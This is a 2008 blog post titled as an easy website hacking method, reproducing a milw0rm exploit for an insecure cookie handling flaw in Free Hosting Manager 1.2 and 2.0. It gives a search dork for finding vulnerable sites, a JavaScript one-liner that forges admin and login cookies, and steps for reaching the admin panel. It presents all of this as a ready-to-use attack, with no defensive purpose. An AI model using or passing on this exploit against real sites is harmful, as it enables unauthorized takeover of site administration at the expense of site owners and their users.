Security
Software
Necessary

Monday, August 25, 2008

One of the easiest method of WEBSITE HACKING

Free Hosting Manager = 1.2 & 2.0
Insecure Cookie Handling Vulnerability

DorKs : "Powered By Free Hosting Manager"

DESCRIPTION :
the admin panel only checks if the cookie exists.

Vulnerability :
after opening the site
just run the javascript in address bar
javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";

as in this blog the complete line
above is not visible..
just copy-paste this
in notepad to see it completely

after running the javascript,
Go to "www.site.com/admin" & Refresh

BANG!!! u will be in admin pannel

AUTHOR : Scary-Boys

source : http://www.milw0rm.com/exploits/6213

Stumble Upon Toolbar

No comments:

Free Web Hosting

Free Web Hosting with Website Builder

Snap Shots

Get Free Shots from Snap.com